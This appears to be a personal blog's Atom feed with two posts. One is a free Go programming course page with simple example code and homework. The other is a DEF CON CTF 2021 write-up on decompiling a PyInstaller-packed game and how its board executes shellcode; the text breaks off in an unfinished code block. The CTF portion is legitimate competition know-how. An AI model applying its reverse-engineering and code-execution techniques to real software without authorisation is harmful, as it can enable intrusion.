<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en"><generator uri="https://jekyllrb.com/" version="4.4.1">Jekyll</generator><link href="http://0.0.0.0/feed.xml" rel="self" type="application/atom+xml" /><link href="http://0.0.0.0/" rel="alternate" type="text/html" hreflang="en" /><updated>2025-08-30T13:25:16-04:00</updated><id>http://0.0.0.0/feed.xml</id><title type="html">Hanbang Wang</title><subtitle>Blog by Hanbang Wang @ SEAS.</subtitle><author><name>Hanbang Wang</name><email>contact@hanbang.wang</email></author><entry><title type="html">Introduction to Go</title><link href="http://0.0.0.0/blog/go-101/" rel="alternate" type="text/html" title="Introduction to Go" /><published>2022-01-09T15:05:00-05:00</published><updated>2022-01-09T15:05:00-05:00</updated><id>http://0.0.0.0/blog/go-101</id><content type="html" xml:base="http://0.0.0.0/blog/go-101/"><![CDATA[<h1 id="go-101">Go 101</h1>

<p>Neither of the classes I TA, CIS 521 and CIS 380, is offered this semester. So, to put that time to use elsewhere, I’m going to offer a brand-new, experimental zero-credit course: <strong>Go 101: Introduction to Go</strong>.</p>

<p>The class will focus on Go syntax, some simple data structures, and goroutine usage. If time permits, some real-world applications, such as operating systems or networking, may be introduced as well.</p>

<p>The class is suitable for anyone interested in Computer Science and Software Engineering, even people with no prior coding experience. I will try to make the class as approachable as possible. However, if you want to learn a language mainly so that you can use existing frameworks or tools, such as stats, AI, big data, quant, etc., this class might not be ideal for you.</p>

<p><strong>This course is NOT affiliated with Penn</strong>. You get absolutely no course credit or certification whatsoever. In turn, the class is completely free of charge, and all course materials will be released into the public domain.</p>

<p>I will still assign homework, which will be graded, and I may also give out tests/quizzes/exams. None of these assignments will have deadlines.</p>

<p>I plan to hold office hours if there are many students and demand is high. Otherwise, email or Piazza should suffice.</p>

<h2 id="resource">Resources</h2>

<dl>
  <dt>Piazza</dt>
  <dd><a target="_blank" href="https://piazza.com/upenn/spring2022/go101">https://piazza.com/upenn/spring2022/go101</a></dd>
  <dt>Gradescope</dt>
  <dd>Entry Code <b>WYREYW</b></dd>
  <dt>Go website</dt>
  <dd><a target="_blank" href="https://go.dev/">The Go Programming Language</a></dd>
  <dt><i>Go 101</i> (Textbook)</dt>
  <dd><a target="_blank" href="https://go101.org/article/101.html">https://go101.org/article/101.html</a></dd>
</dl>

<p>Let me know via email if you are not a Penn student but would still like access to the quizzes.</p>

<h2 id="schedule">Schedule</h2>

<p>The class meets weekly on Thursdays from 7 PM to 8:30 PM Eastern Time, from January 13th to April 21st, for 15 meetings in total. This schedule is tentative for now.</p>

<p>Meetings are held remotely via Zoom: <a href="https://upenn.zoom.us/j/93107977009?pwd=ZnFIR0M3VHdWbG1VOS9remJONFJ2UT09">https://upenn.zoom.us/j/93107977009?pwd=ZnFIR0M3VHdWbG1VOS9remJONFJ2UT09</a>. Classes will be recorded.</p>

<p>Slides may or may not be made, depending on the content.</p>

<h3 id="jan-13">Jan 13</h3>

<h4 id="topic">Topic</h4>

<ul>
  <li>Class intro</li>
  <li>Programming language intro (and why Go)</li>
  <li>Binary data and memory intro</li>
  <li>Primitive data types in Go</li>
</ul>

<h4 id="recommend-reading">Recommended reading</h4>

<ul>
  <li><a href="https://en.wikipedia.org/wiki/Programming_language">Programming language - Wikipedia</a></li>
  <li><a href="https://go.dev/solutions/">Why Go - The Go Programming Language</a></li>
  <li><a href="https://en.wikipedia.org/wiki/Binary_data">Binary data - Wikipedia</a></li>
  <li><a href="https://en.wikipedia.org/wiki/Binary_number#Conversion_to_and_from_other_numeral_systems">Conversion to and from other numeral systems | Binary number - Wikipedia</a></li>
  <li><a href="https://en.wikipedia.org/wiki/Nibble">Nibble - Wikipedia</a></li>
  <li><a href="https://en.wikipedia.org/wiki/Memory_address">Memory address - Wikipedia</a></li>
  <li><a href="https://en.wikipedia.org/wiki/Byte">Byte - Wikipedia</a></li>
  <li><a href="https://en.wikipedia.org/wiki/Two's_complement">Two’s complement - Wikipedia</a></li>
  <li><a href="https://en.wikipedia.org/wiki/Floating-point_arithmetic">Floating-point arithmetic - Wikipedia</a></li>
  <li><a href="https://en.wikipedia.org/wiki/IEEE_754#Formats">IEEE 754 - Wikipedia</a></li>
</ul>
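<p>Here is a small sketch that makes the binary-data topics a bit more concrete. It is not from the lecture itself. It prints the two’s-complement bit pattern of an <code class="language-plaintext highlighter-rouge">int8</code> and the raw IEEE 754 bits of a <code class="language-plaintext highlighter-rouge">float64</code>. The helper names <code class="language-plaintext highlighter-rouge">bits8</code> and <code class="language-plaintext highlighter-rouge">float64Hex</code> are made up for this example.</p>

<pre><code class="language-go">package main

import (
	"fmt"
	"math"
)

// bits8 returns the 8-bit two's-complement pattern of x by reinterpreting
// the same bits as an unsigned uint8.
func bits8(x int8) string {
	return fmt.Sprintf("%08b", uint8(x))
}

// float64Hex returns the raw IEEE 754 double-precision bits of f in hex.
func float64Hex(f float64) string {
	return fmt.Sprintf("0x%016x", math.Float64bits(f))
}

func main() {
	fmt.Println(bits8(5))    // 00000101
	fmt.Println(bits8(-5))   // 11111011 (invert 00000101, then add 1)
	fmt.Println(bits8(-128)) // 10000000

	fmt.Println(float64Hex(1.0))  // 0x3ff0000000000000 (sign 0, exponent 0x3ff, fraction 0)
	fmt.Println(float64Hex(-2.0)) // 0xc000000000000000 (sign 1, exponent 0x400, fraction 0)
}
</code></pre>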

<h4 id="homework">Homework</h4>

<p>A quiz is released on Gradescope.</p>

<h4 id="recording">Recording</h4>

<p><a href="https://upenn.zoom.us/rec/share/2Zo7h1x8wjBLc0T076D9qAktdORwy2HBi47cW0GDP0vx5yarPxjdzb9pilupCb-_.5AI9jICXkrAZArfN">https://upenn.zoom.us/rec/share/2Zo7h1x8wjBLc0T076D9qAktdORwy2HBi47cW0GDP0vx5yarPxjdzb9pilupCb-_.5AI9jICXkrAZArfN</a> Passcode: 2*+R2EFB</p>

<h3 id="jan-20">Jan 20</h3>

<h4 id="topic-1">Topic</h4>

<ul>
  <li>Packages and function intro</li>
  <li>Variables intro</li>
  <li>Primitive literals
    <ul>
      <li>Integer</li>
      <li>Floating-point</li>
      <li>Complex</li>
      <li>Boolean</li>
      <li>String</li>
    </ul>
  </li>
</ul>
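<p>The sketch below is a quick reference for the literal kinds listed above, with one or two examples of each. It is my own example and assumes Go 1.13 or later, which added the <code class="language-plaintext highlighter-rouge">0o</code>/<code class="language-plaintext highlighter-rouge">0b</code> prefixes and underscore digit separators.</p>

<pre><code class="language-go">package main

import "fmt"

func main() {
	// Integer literals: decimal, hex, octal, and binary forms of 255.
	// Underscores may separate digits for readability.
	fmt.Println(255, 0xFF, 0o377, 0b1111_1111) // 255 255 255 255

	// Floating-point literals, including exponent and hexadecimal forms.
	fmt.Println(1.5, .25, 6.02e23, 0x1p-2)

	// Complex literals: the imaginary part carries the suffix i.
	c := 3 + 4i
	fmt.Println(real(c), imag(c)) // 3 4

	// Boolean literals are the predeclared constants true and false.
	fmt.Println(true, !true) // true false

	// Interpreted strings process escapes such as \t; raw strings (in backquotes) do not.
	fmt.Println(len("a\tb"), len(`a\tb`)) // 3 4
}
</code></pre>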

<h4 id="recommend-reading-1">Recommended reading</h4>

<p><a href="https://go101.org/article/basic-types-and-value-literals.html">Basic Types and Basic Value Literals -Go 101</a></p>

<h4 id="homework-1">Homework</h4>

<p>A quiz is released on Gradescope.</p>

<h4 id="recording-1">Recording</h4>

<p><a href="https://upenn.zoom.us/rec/share/CwUbPM2_T1sbMhVBAY_vGwysJMd234extmseDMVD64romoRXQ93lKK-hKah71yYx.1-kwbZNHCoTtvOMs">https://upenn.zoom.us/rec/share/CwUbPM2_T1sbMhVBAY_vGwysJMd234extmseDMVD64romoRXQ93lKK-hKah71yYx.1-kwbZNHCoTtvOMs</a> Passcode: Dg8!dHA5</p>

<h3 id="jan-27">Jan 27</h3>

<h4 id="topic-2">Topic</h4>

<ul>
  <li>Basic Operators</li>
  <li>Variables (continued) and Constants</li>
  <li>Type conversion</li>
  <li><del>Scope</del></li>
</ul>

<h4 id="recommend-reading-2">Recommended reading</h4>

<ul>
  <li><a href="https://go101.org/article/operators.html">Common Operators -Go 101</a></li>
  <li><a href="https://go101.org/article/constants-and-variables.html">Constants and Variables -Go 101</a></li>
</ul>
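<p>A minimal sketch of a few points from this week’s topics:</p>
<ul>
  <li>untyped constants are exact;</li>
  <li>integer division truncates toward zero;</li>
  <li>numeric conversions must be written out explicitly.</li>
</ul>
<p>The names are made up for illustration.</p>

<pre><code class="language-go">package main

import "fmt"

// Untyped constants are exact and only take on a type when they are used.
const huge = 1_000_000_000_000_000_000_000_000 // 10^27: too big for int64, fine as a constant

func main() {
	fmt.Println(huge / 1_000_000_000_000_000_000) // 1000000 (the result fits in an int)

	// Constant arithmetic is exact, while float64 arithmetic at run time rounds.
	x, y := 0.1, 0.2
	fmt.Println(0.1+0.2 == 0.3, x+y == 0.3) // true false

	// Integer division truncates toward zero; % takes the sign of the dividend.
	fmt.Println(7/2, -7/2, -7%2) // 3 -3 -1

	// Conversions between numeric types are always explicit: T(v).
	n := 7
	f := 3.99
	fmt.Println(float64(n)/2, int(f)) // 3.5 3 (float-to-int conversion truncates)
}
</code></pre>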

<h4 id="homework-2">Homework</h4>

<p>A quiz is released on Gradescope.</p>

<h4 id="recording-2">Recording</h4>

<p><a href="https://upenn.zoom.us/rec/share/WbADhx89M5ynkIG0o7XEaIzWXMBzuZwNXjlOXLmrOLwaSMAV67qlZ5yeCd62Pr6i.4hZ9JBlD_cSda3ti">https://upenn.zoom.us/rec/share/WbADhx89M5ynkIG0o7XEaIzWXMBzuZwNXjlOXLmrOLwaSMAV67qlZ5yeCd62Pr6i.4hZ9JBlD_cSda3ti</a> (Passcode: Nj@T5!x^)</p>

<h3 id="feb-3">Feb 3</h3>

<h4 id="topic-3">Topic</h4>

<ul>
  <li>Scope</li>
  <li>Intro to functions</li>
  <li>Package and Import</li>
  <li>Array</li>
  <li>Demo: writing and compiling code</li>
</ul>

<h4 id="recommend-reading-3">Recommended reading</h4>

<ul>
  <li><a href="https://go101.org/article/packages-and-imports.html">Code Packages and Package Imports -Go 101</a></li>
  <li><a href="https://go101.org/article/function-declarations-and-calls.html">Function Declarations and Function Calls -Go 101</a> (relevant parts only)</li>
  <li><a href="https://go101.org/article/container.html">Arrays, Slices and Maps in Go -Go 101</a> (relevant parts only)</li>
</ul>

<h4 id="recording-3">Recording</h4>

<p><a href="https://upenn.zoom.us/rec/share/Pb3fBvqMnUu6887REkODH1OKu8kWRfNg4HlEPrfrWzCKNtp8PMJ047lBs4a_Iitd.TTIQK1i6qyoEpTXK">https://upenn.zoom.us/rec/share/Pb3fBvqMnUu6887REkODH1OKu8kWRfNg4HlEPrfrWzCKNtp8PMJ047lBs4a_Iitd.TTIQK1i6qyoEpTXK</a> (Passcode: Hyw3b=nw)</p>

<h4 id="homework-3">Homework</h4>

<p>A programming assignment is released on Gradescope.</p>

<h2 id="homework-4">Homework</h2>

<h3 id="operators--functions">Operators &amp; Functions</h3>

<p>In this first assignment, you will write several functions with the given signatures and implement the required functionality in each of them.</p>

<p>There are five parts to the assignment. Because Go is a compiled language and this homework tests your ability to write functions, you have to finish (almost) the entire homework before your code will compile. The autograder will then test whether each implemented function behaves correctly.</p>

<p>Before you start, please follow the instructions to install Go on your local computer (you should already have it if you finished Quiz 1). Then, follow the demo at the end of the <em>Feb 3</em> class, where we showed how to set up a Go environment on your computer.</p>

<p>Once you have done that, create a file named <code class="language-plaintext highlighter-rouge">main.go</code> in your working directory. This is the only file in which you will write Go code for this homework. When you are done, submit ONLY this file to Gradescope.</p>

<p>For this homework, use package name <code class="language-plaintext highlighter-rouge">main</code>.</p>

<h4 id="part-1">Part 1</h4>

<p>Declare a <strong>constant</strong> at <strong>package-level</strong> of the <code class="language-plaintext highlighter-rouge">main</code> package, named <code class="language-plaintext highlighter-rouge">CourseName</code>, which has type <code class="language-plaintext highlighter-rouge">string</code> and value <code class="language-plaintext highlighter-rouge">"Go 101"</code>.</p>

<p>Recall that a constant declaration starts with <code class="language-plaintext highlighter-rouge">const</code>, and that package level means the top level of a file (i.e. not inside any code block). Also recall that identifiers are case sensitive.</p>
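<p>For illustration only, here is a package-level constant declaration that does <em>not</em> solve Part 1, since it uses the made-up name <code class="language-plaintext highlighter-rouge">Greeting</code>. It shows where such a declaration goes and that two identifiers differing only in case are distinct.</p>

<pre><code class="language-go">package main

import "fmt"

// Greeting is a made-up typed constant declared at package level,
// i.e. outside of any function or other code block.
const Greeting string = "hello"

// Identifiers are case sensitive, so greeting is a separate constant.
const greeting = "hi"

func main() {
	fmt.Println(Greeting, len(Greeting)) // hello 5
	fmt.Println(greeting)                // hi
}
</code></pre>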

<h4 id="part-2">Part 2</h4>

<p>Declare a <strong>variable</strong> at <strong>package-level</strong> of the <code class="language-plaintext highlighter-rouge">main</code> package, named <code class="language-plaintext highlighter-rouge">Counter</code>, with type <code class="language-plaintext highlighter-rouge">uint8</code>, initialized to its zero value. Recall that a variable declaration starts with <code class="language-plaintext highlighter-rouge">var</code>.</p>

<p>After that, declare a <strong>function</strong> named <code class="language-plaintext highlighter-rouge">IncCounter</code>, which has no arguments and no return values. Each time <code class="language-plaintext highlighter-rouge">IncCounter</code> is called, <strong>increase</strong> <code class="language-plaintext highlighter-rouge">Counter</code> by <strong>one</strong>. Recall operators <code class="language-plaintext highlighter-rouge">+</code>, <code class="language-plaintext highlighter-rouge">+=</code>, or <code class="language-plaintext highlighter-rouge">++</code>.</p>

<p>Your code should not access <code class="language-plaintext highlighter-rouge">Counter</code> anywhere else.</p>
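<p>Here is a similar sketch for package-level variables, again with made-up names (<code class="language-plaintext highlighter-rouge">Hits</code>, <code class="language-plaintext highlighter-rouge">addHits</code>). It also shows something worth knowing for this part: a <code class="language-plaintext highlighter-rouge">uint8</code> holds only 0 to 255, so arithmetic on it wraps around.</p>

<pre><code class="language-go">package main

import "fmt"

// Hits is a hypothetical package-level variable. It has no initializer, so it
// starts at the zero value of its type, which is 0 for uint8.
var Hits uint8

// addHits is a made-up helper that modifies the package-level variable.
func addHits(n uint8) {
	Hits += n
}

func main() {
	fmt.Println(Hits) // 0
	addHits(200)
	addHits(100)
	// uint8 only holds 0 to 255, so 200 + 100 = 300 wraps around to 300 - 256 = 44.
	fmt.Println(Hits) // 44
}
</code></pre>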

<h4 id="part-3">Part 3</h4>

<p>Declare a <strong>function</strong> named <code class="language-plaintext highlighter-rouge">BoolOperation</code>, which takes in <strong>two</strong> <code class="language-plaintext highlighter-rouge">bool</code> arguments and returns <strong>four</strong> <code class="language-plaintext highlighter-rouge">bool</code> values.</p>

<p>The first return value is the <strong>logical and</strong> of the two input arguments; the second return value is the <strong>logical or</strong> of the two input arguments; the third return value is the <strong>logical not</strong> of the first input argument; the fourth return value is the <strong>logical not</strong> of the second input argument.</p>

<p>Recall that <strong>logical and</strong> uses the binary operator <code class="language-plaintext highlighter-rouge">&amp;&amp;</code>, <strong>logical or</strong> uses the binary operator <code class="language-plaintext highlighter-rouge">||</code>, and <strong>logical not</strong> uses the unary operator <code class="language-plaintext highlighter-rouge">!</code>. Also recall that values are returned with the <code class="language-plaintext highlighter-rouge">return</code> keyword.</p>
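<p>The sketch below shows multiple return values using a made-up function, <code class="language-plaintext highlighter-rouge">divMod</code>, rather than the one you need to write. The result types go in parentheses after the parameter list, and <code class="language-plaintext highlighter-rouge">return</code> lists the values in the same order.</p>

<pre><code class="language-go">package main

import "fmt"

// divMod is a made-up function with two parameters and two results.
// The result types are listed in parentheses after the parameter list.
func divMod(a, b int) (int, int) {
	return a / b, a % b // values are returned in the order the types are listed
}

func main() {
	q, r := divMod(17, 5)
	fmt.Println(q, r) // 3 2

	// Use _ to discard a result you don't need.
	_, rem := divMod(9, 4)
	fmt.Println(rem) // 1
}
</code></pre>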

<h4 id="part-4">Part 4</h4>

<p>Declare a <strong>function</strong> named <code class="language-plaintext highlighter-rouge">IntArrayOperation</code>, which takes in a single <strong><code class="language-plaintext highlighter-rouge">int</code> array of size 4</strong>, and returns <strong>three</strong> <code class="language-plaintext highlighter-rouge">int</code> values.</p>

<p>The first return value is the <strong>sum</strong> of the first and second elements of the array; the second return value is the <strong>sum</strong> of the third and fourth elements; the third return value is the <strong>product</strong> (multiplication) of the previous two return values (i.e. the sum of the first and second elements multiplied by the sum of the third and fourth elements of the argument array).</p>

<p>Recall the operators <code class="language-plaintext highlighter-rouge">+</code> and <code class="language-plaintext highlighter-rouge">*</code>, and take care with operator precedence. Recall that the type of an array with element type <code class="language-plaintext highlighter-rouge">T</code> and size <code class="language-plaintext highlighter-rouge">N</code> is <code class="language-plaintext highlighter-rouge">[N]T</code>, that the <em>i</em>th element of an array <code class="language-plaintext highlighter-rouge">arr</code> is accessed with <code class="language-plaintext highlighter-rouge">arr[i]</code>, and that indices start from <strong>0</strong>.</p>

<p>You can assume that doing the above operations won’t cause overflows.</p>
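<p>Here is a sketch of array types, indexing, and precedence, using a made-up function <code class="language-plaintext highlighter-rouge">firstAndLast</code> on a <code class="language-plaintext highlighter-rouge">[3]string</code>:</p>

<pre><code class="language-go">package main

import "fmt"

// firstAndLast is a made-up function taking an array of type [3]string
// (size 3, element type string). Indices run from 0 to len(words)-1.
func firstAndLast(words [3]string) (string, string) {
	return words[0], words[len(words)-1]
}

func main() {
	a, b := firstAndLast([3]string{"go", "is", "fun"})
	fmt.Println(a, b) // go fun

	// * binds tighter than +, so parentheses are needed to add first.
	fmt.Println(1+2*3+4, (1+2)*(3+4)) // 11 21
}
</code></pre>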

<h4 id="part-5">Part 5</h4>

<p>Declare a <strong>function</strong> named <code class="language-plaintext highlighter-rouge">PackFloatArray</code>, which takes <strong>four</strong> <code class="language-plaintext highlighter-rouge">float64</code> arguments and returns a single <strong><code class="language-plaintext highlighter-rouge">float64</code> array of size 4</strong>.</p>

<p>As the name suggests, the return value should be a <code class="language-plaintext highlighter-rouge">float64</code> array that stores the four given arguments in the order they were given. More specifically, the first value in the array should be the first argument given to the function, the second value in the array should be the second argument, and so on.</p>

<p>To return an array, return it the same way as any other values.</p>
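<p>The made-up function <code class="language-plaintext highlighter-rouge">pair</code> below builds an array with a composite literal and returns it like any other value. Note also that arrays are values in Go, so assigning or returning one copies its elements.</p>

<pre><code class="language-go">package main

import "fmt"

// pair is a made-up function that builds and returns an array of type
// [2]string; a composite literal keeps elements in the order they are listed.
func pair(a, b string) [2]string {
	return [2]string{a, b}
}

func main() {
	p := pair("left", "right")
	fmt.Println(p[0], p[1]) // left right

	// Arrays are values: assigning one copies all of its elements.
	q := p
	q[0] = "changed"
	fmt.Println(p[0], q[0]) // left changed
}
</code></pre>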

<hr />

<p>After implementing these five parts, first check whether your code compiles. Note that successful compilation doesn’t mean the program is correct, but it does mean that all the types and operations are valid.</p>

<p>Later we will talk about how to properly write test cases for your code. For now, we can just use the <code class="language-plaintext highlighter-rouge">main</code> function to test our program. Within <code class="language-plaintext highlighter-rouge">main</code>, pick some input values, call your functions with them, and print the results using <code class="language-plaintext highlighter-rouge">println</code> or <code class="language-plaintext highlighter-rouge">fmt.Println</code>. If the output looks correct, you are good to go.</p>
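<p>One way to do this is to compare each result with the value you expect and print whether it matched. The sketch below uses a stand-in function <code class="language-plaintext highlighter-rouge">square</code> and a made-up helper <code class="language-plaintext highlighter-rouge">check</code>. In the standard toolchain, the built-in <code class="language-plaintext highlighter-rouge">println</code> writes to standard error, while <code class="language-plaintext highlighter-rouge">fmt.Println</code> writes to standard output.</p>

<pre><code class="language-go">package main

import "fmt"

// square is a stand-in for whichever function you want to test.
func square(x int) int {
	return x * x
}

// check is a made-up helper: it compares a result with the expected value,
// prints a line either way, and reports whether they matched.
func check(name string, got, want int) bool {
	if got != want {
		fmt.Println("FAIL", name, "got", got, "want", want)
		return false
	}
	fmt.Println("ok", name)
	return true
}

func main() {
	check("square(3)", square(3), 9)
	check("square(-4)", square(-4), 16)
}
</code></pre>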

<p>Submit <code class="language-plaintext highlighter-rouge">main.go</code> to Gradescope and get a score to see how well you did!</p>]]></content><author><name>Hanbang Wang</name><email>contact@hanbang.wang</email></author><category term="blog" /><category term="Programming" /><category term="Go" /><category term="Lecture" /><summary type="html"><![CDATA[An experimental zero credit course.]]></summary></entry><entry><title type="html">DEF CON CTF 2021</title><link href="http://0.0.0.0/blog/defcon-ctf-2021/" rel="alternate" type="text/html" title="DEF CON CTF 2021" /><published>2021-08-22T12:30:00-04:00</published><updated>2021-08-22T12:30:00-04:00</updated><id>http://0.0.0.0/blog/defcon-ctf-2021</id><content type="html" xml:base="http://0.0.0.0/blog/defcon-ctf-2021/"><![CDATA[<p>A week before the game, Tea Deliverers split up into four sub-teams and held an internal competition using some past challenges with minor tweaks. I was the only one on our team doing the KoH challenge, and I did fairly well, so I decided to be a KoH player for the finals. I was sure the challenges would keep me busy without stressing me out during the game, as there would be exactly one completely new challenge each day.</p>

<p>It turned out I was right. I enjoyed each and every King of the Hill challenge, and I got plenty of rest during the breaks, which fell in the daytime in China. A very healthy lifestyle indeed.</p>

<h1 id="zero-is-you">zero-is-you</h1>

<p><img src="/assets/images/defcon-ctf-2021/zero-is-you-score.png" alt="zero-is-you-score" /></p>

<p>This challenge was a clone of the game <em>Baba is You</em>. What’s nice about the original game is that it’s already Turing complete, and once you add shellcode execution on top of it, whoa, you open the gate to another dimension. (insert mind-blown meme pic here)</p>

<p>For those without prior experience with <em>Baba is You</em>, it is a Sokoban-style puzzle game in which the player pushes blocks into different places. There are some famous modern takes on this classic genre, like <em>A Good Snowman Is Hard To Build</em> or <em>Stephen’s Sausage Roll</em>. The twist in <em>Baba is You</em> is that the blocks themselves can form instructions that define how the game world works. I will explain this in more detail below.</p>

<p>I really recommend trying out <em>Baba is You</em>, but a <small>smol</small> brain like me couldn’t finish the game without looking at a walkthrough, sad.</p>

<h2 id="extract-game-code">Extract Game Code</h2>

<p>The provided package <code class="language-plaintext highlighter-rouge">game_client.tgz</code> contained a few files: <code class="language-plaintext highlighter-rouge">README</code>, <code class="language-plaintext highlighter-rouge">start</code>, <code class="language-plaintext highlighter-rouge">sync</code>, and a <code class="language-plaintext highlighter-rouge">build</code> folder. <code class="language-plaintext highlighter-rouge">README</code> told us how the game worked. <code class="language-plaintext highlighter-rouge">start</code> was a shell script that simply ran the <code class="language-plaintext highlighter-rouge">zero-is-you</code> binary in the <code class="language-plaintext highlighter-rouge">build</code> folder.</p>

<p>Since <code class="language-plaintext highlighter-rouge">sync</code> was meant to be run with <code class="language-plaintext highlighter-rouge">python3</code>, it had to be a Python program. It was not a text file, so it had to be compiled Python bytecode, like a <code class="language-plaintext highlighter-rouge">.pyc</code>. Using an existing decompiler, <a href="https://github.com/rocky/python-decompile3">rocky/python-decompile3</a>, we were able to decompile <code class="language-plaintext highlighter-rouge">sync</code> back into Python source code. There was nothing interesting about <code class="language-plaintext highlighter-rouge">sync</code>; it just uploaded data to and downloaded data from the server. As for what data it actually transmitted, we’ll get back to that in a sec.</p>

<p>After @riatre gave us the hint that the entire game was written in Python, I, as a Game Data-Mine Professional™, dove straight into extracting the game data without even playing the game first. A quick <code class="language-plaintext highlighter-rouge">strings</code> on the <code class="language-plaintext highlighter-rouge">zero-is-you</code> ELF binary showed things like <code class="language-plaintext highlighter-rouge">_MEIPASS2</code>, and a quick Google search told us that this program was packed with <code class="language-plaintext highlighter-rouge">PyInstaller</code>. Using an existing extractor, <a href="https://github.com/extremecoders-re/pyinstxtractor">extremecoders-re/pyinstxtractor</a>, we were able to extract every <code class="language-plaintext highlighter-rouge">.pyc</code> from the binary, and with the aforementioned decompiler we turned that bytecode back into <code class="language-plaintext highlighter-rouge">.py</code> files. Although there were some decompilation errors, we recovered most of the game as source code.</p>

<p>Once we had the extracted game, my teammates could run it on Windows and macOS without problems. We also added custom features to the game, such as undo, which simply replayed the recorded moves minus the last one. The decompiled source code also helped us figure out the format of the level files and the rules of the game, which I will talk about later.</p>

<h2 id="ready-player-one">Ready Player One</h2>

<p>OOO’s internet was down, so we were not able to use <code class="language-plaintext highlighter-rouge">sync</code> to communicate with the server, but they kindly sent us the <code class="language-plaintext highlighter-rouge">level1</code> file so that we could look into this level first.</p>

<p>Having some prior experience with <em>Baba is You</em>, I immediately knew what was going on. At the top we had two “rules,” <code class="language-plaintext highlighter-rouge">zero is you</code> and <code class="language-plaintext highlighter-rouge">ice is stop</code>. The former meant that we were currently in control of <code class="language-plaintext highlighter-rouge">zero</code>, and the latter meant that everything stopped in front of <code class="language-plaintext highlighter-rouge">ice</code>. So <code class="language-plaintext highlighter-rouge">zero</code> referred to the little hacker boy icon in the middle of the screen, which was easy to confirm by moving <code class="language-plaintext highlighter-rouge">zero</code> with the arrow keys. <code class="language-plaintext highlighter-rouge">ice</code> referred to the ice blocks surrounding the middle part of the screen, plus a line of ice blocks at the top.</p>

<p>Any three blocks of the form <code class="language-plaintext highlighter-rouge">[xxx] [is] [yyy]</code>, read from left to right or from top to bottom, formed a “rule” that was enforced in the game world. You could make a new rule by pushing blocks around and lining them up, or break an existing rule by splitting its blocks apart. One special rule is <code class="language-plaintext highlighter-rouge">[noun] is you</code>, which lets the player control that <code class="language-plaintext highlighter-rouge">[noun]</code> thing on the board, just like in <em>Baba is You</em>.</p>
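<p>The rule-reading logic can be sketched roughly as follows. This is my own simplification, not the game’s code. The board is a hypothetical map from (row, column) to the word on each text block. Any three blocks spelling <code class="language-plaintext highlighter-rouge">X is Y</code> to the right or downward count as a rule. The example board is an L shape in which a single <code class="language-plaintext highlighter-rouge">cpu</code> block starts both a horizontal and a vertical rule. The sketch assumes Go 1.21 or later for the <code class="language-plaintext highlighter-rouge">slices</code> package.</p>

<pre><code class="language-go">package main

import (
	"fmt"
	"slices"
	"strings"
)

// Rule is a hypothetical representation of one "[noun] is [property]" rule.
type Rule struct{ Noun, Prop string }

// Board maps a (row, col) position to the word on the text block there.
// Empty cells are simply absent, so looking them up yields "".
type Board map[[2]int]string

// isRule reports whether three words, in reading order, spell "X is Y".
func isRule(a, b, c string) bool {
	if a == "" || c == "" || a == "is" || c == "is" {
		return false
	}
	return b == "is"
}

// findRules checks, from every block, the two blocks to its right and the
// two blocks below it, since rules read left to right or top to bottom.
func findRules(b Board) []Rule {
	var rules []Rule
	for pos, word := range b {
		r, c := pos[0], pos[1]
		if isRule(word, b[[2]int{r, c + 1}], b[[2]int{r, c + 2}]) {
			rules = append(rules, Rule{word, b[[2]int{r, c + 2}]})
		}
		if isRule(word, b[[2]int{r + 1, c}], b[[2]int{r + 2, c}]) {
			rules = append(rules, Rule{word, b[[2]int{r + 2, c}]})
		}
	}
	// Map iteration order is random, so sort for stable output.
	slices.SortFunc(rules, func(x, y Rule) int {
		return strings.Compare(x.Noun+" "+x.Prop, y.Noun+" "+y.Prop)
	})
	return rules
}

func main() {
	// One cpu block in the corner starts both "cpu is x64" and "cpu is run".
	b := Board{
		{0, 0}: "cpu", {0, 1}: "is", {0, 2}: "x64",
		{1, 0}: "is",
		{2, 0}: "run",
	}
	fmt.Println(findRules(b)) // [{cpu run} {cpu x64}]
}
</code></pre>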

<p>However, the processor-looking block and the line of hex values at the top of the screen were not part of <em>Baba is You</em>. After a further look into the source code and some trial and error with the blocks, we figured out how the entire game works:</p>

<h3 id="shellcode-mechanism">Shellcode Mechanism</h3>

<p>The entire screen, a \(25 \times 15\) grid of blocks, was actually the memory of the machine, so addresses ranged from <samp>0x0</samp> to <samp>0x176</samp> (\(375\) bytes in total). Memory was laid out row by row, left to right, so the layout was</p>

\[\begin{matrix} 
\texttt{0x00} &amp; \texttt{0x01} &amp; \cdots &amp; \texttt{0x18} \\
\texttt{0x19} &amp; \texttt{0x1a} &amp; \cdots &amp; \texttt{0x31} \\
\vdots &amp; \vdots &amp; \ddots &amp; \vdots \\
\texttt{0x15e} &amp; \texttt{0x15f} &amp; \cdots &amp; \texttt{0x176} 
\end{matrix}\]
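<p>In other words, with the row-major layout above, the block at row \(r\) and column \(c\) (both counted from 0) holds address \(25r + c\). Here is a small sketch of the conversion in both directions. The function names are made up.</p>

<pre><code class="language-go">package main

import "fmt"

// Board size in blocks, as described above.
const (
	cols = 25
	rows = 15
)

// addrOf returns the memory address of the block at (row, col),
// counting both from 0 in the top-left corner.
func addrOf(row, col int) int {
	return row*cols + col
}

// posOf is the inverse of addrOf.
func posOf(addr int) (row, col int) {
	return addr / cols, addr % cols
}

func main() {
	fmt.Printf("%#x %#x\n", addrOf(0, cols-1), addrOf(1, 0)) // 0x18 0x19
	fmt.Printf("%#x %#x\n", addrOf(1, 1), addrOf(rows-1, 1)) // 0x1a 0x15f
	fmt.Printf("%#x\n", addrOf(rows-1, cols-1))              // 0x176
	fmt.Println(posOf(0x176))                                // 14 24
}
</code></pre>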

<p>The hex bytes displayed on the blocks were the values stored at those memory addresses. A block whose value was zero was displayed as empty. You could switch the display style by pressing <kbd>`</kbd> (backquote), which hid the game blocks and showed the zero values as well.</p>

<p>The block that looked like a processor, located in the top-left corner of the board, acted as a program counter (or instruction pointer). It executed memory if and only if two rules were on the board at the same time: one specifying an architecture (<code class="language-plaintext highlighter-rouge">cpu is [arch]</code>) and <code class="language-plaintext highlighter-rouge">cpu is run</code>. If <code class="language-plaintext highlighter-rouge">cpu is run</code> was on the board but no architecture was specified, a segfault was thrown.</p>

<p>When <code class="language-plaintext highlighter-rouge">cpu is run</code> was on the board, every time the player made a move, either using arrow keys or the <kbd>Space</kbd> key to stay where you were, the machine would execute the instruction at the program counter (location of the processor block).</p>
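<p>The execution conditions above can be summarized in a short sketch. Everything here is hypothetical: the <code class="language-plaintext highlighter-rouge">machine</code> type, <code class="language-plaintext highlighter-rouge">onMove</code>, and the <code class="language-plaintext highlighter-rouge">step</code> callback, which stands in for decoding and running one instruction. The decompiled game may be structured quite differently.</p>

<pre><code class="language-go">package main

import (
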